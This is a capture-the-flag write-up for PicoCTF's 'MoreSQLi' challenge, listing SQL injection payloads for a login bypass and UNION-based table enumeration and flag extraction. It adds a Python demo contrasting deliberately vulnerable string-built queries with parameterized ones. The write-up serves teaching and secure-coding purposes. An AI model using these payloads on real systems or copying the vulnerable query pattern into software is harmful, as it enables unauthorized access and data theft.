
PicoCTF 2023: MoreSQLi

The MoreSQLi challenge presented a login portal vulnerable to SQL injection. The objective was to exploit the SQL injection vulnerability, navigate through the database, and retrieve the hidden flag.


Step-by-Step Walk-through


1. Identifying SQL Injection

The initial step was to determine whether the login portal was vulnerable to SQL injection. To do this, we tried to trigger a database error by entering random characters in the login fields.


By injecting the password field with a condition that always evaluates to true, it became apparent that the application was not properly sanitizing user input, and we logged in successfully.

Payload:

' OR 1=1;--



2. Listing Tables

After the successful login, the next step was to enumerate the database tables, using "Algiers" as the prefix of the payload. This was achieved with a union-based SQL injection payload that extracts the names of all tables from the sqlite_master table, which stores the database's metadata.

Payload:

Algiers' UNION SELECT name, 1, 1 FROM sqlite_master;--



Among the listed tables, a previously undisclosed table named more_table was identified. This table had not been exposed anywhere in the application, indicating that it might contain important data.


4. Extracting Table Structure

To learn the structure of more_table, another union-based injection was used to fetch the table's CREATE statement from sqlite_master.

Payload:

Algiers' UNION SELECT sql, 1, 1 FROM sqlite_master WHERE name='more_table';--


The UNION SELECT sql, 1, 1 FROM sqlite_master WHERE name='more_table';-- part of the payload retrieves the SQL statement that was used to create more_table.




5. Retrieving the Flag

With the structure of more_table known, the final step was to extract the contents of this table, specifically targeting columns that might contain the flag.

Payload:

Algiers' UNION SELECT flag, id, 1 FROM more_table;--
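To show why the three payloads above work and how the portal should have been written, here is an added Python example that is not part of the original writeup or the challenge's source. It builds a constructed in-memory SQLite database (the users and offices tables and their columns are assumed; only more_table, its flag and id columns, and sqlite_master come from the writeup), runs the payloads against string-built queries, and then runs them against the parameterized versions, where they are treated as plain data.

```python
import sqlite3

PAYLOAD_LOGIN = "' OR 1=1;--"
PAYLOAD_TABLES = "Algiers' UNION SELECT name, 1, 1 FROM sqlite_master;--"
PAYLOAD_FLAG = "Algiers' UNION SELECT flag, id, 1 FROM more_table;--"

def make_db():
    """Constructed in-memory SQLite database standing in for the challenge's database.
    Table and column names other than more_table, flag, id and sqlite_master are assumed."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'constructed-secret');
        CREATE TABLE offices (id INTEGER, city TEXT, address TEXT);
        INSERT INTO offices VALUES (1, 'Algiers', 'constructed address');
        CREATE TABLE more_table (id INTEGER, flag TEXT);
        INSERT INTO more_table VALUES (1, 'picoCTF{constructed_placeholder}');
    """)
    return con

def login_vulnerable(con, username, password):
    # Vulnerable: user input is pasted into the SQL text, so ' OR 1=1;-- turns the
    # WHERE clause into a tautology and comments out the trailing quote.
    sql = f"SELECT id FROM users WHERE username='{username}' AND password='{password}'"
    return con.execute(sql).fetchone() is not None

def login_safe(con, username, password):
    # Hardened: bound parameters are passed as data and never parsed as SQL.
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone() is not None

def search_vulnerable(con, city):
    # The post-login search returns three columns, which is why the writeup's UNION
    # payloads pad their SELECT with two dummy values (name, 1, 1).
    sql = f"SELECT city, address, id FROM offices WHERE city='{city}'"
    return con.execute(sql).fetchall()

def search_safe(con, city):
    sql = "SELECT city, address, id FROM offices WHERE city=?"
    return con.execute(sql, (city,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, "admin", PAYLOAD_LOGIN))  # True
    print("safe login:", login_safe(db, "admin", PAYLOAD_LOGIN))              # False
    print("tables via UNION:", [r[0] for r in search_vulnerable(db, PAYLOAD_TABLES)])
    print("flag via UNION:", [r[0] for r in search_vulnerable(db, PAYLOAD_FLAG)])
    print("safe search:", search_safe(db, PAYLOAD_TABLES))                    # []
```

The parameterized versions return no match for any of the payloads because the whole string, quote and comment marker included, is compared as a literal value.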



1 Comment


Willie Kimani
May 22, 2024

Impressive work, I love the details step by step and quite easy to follow up.


© 2025 by c@rtm@n
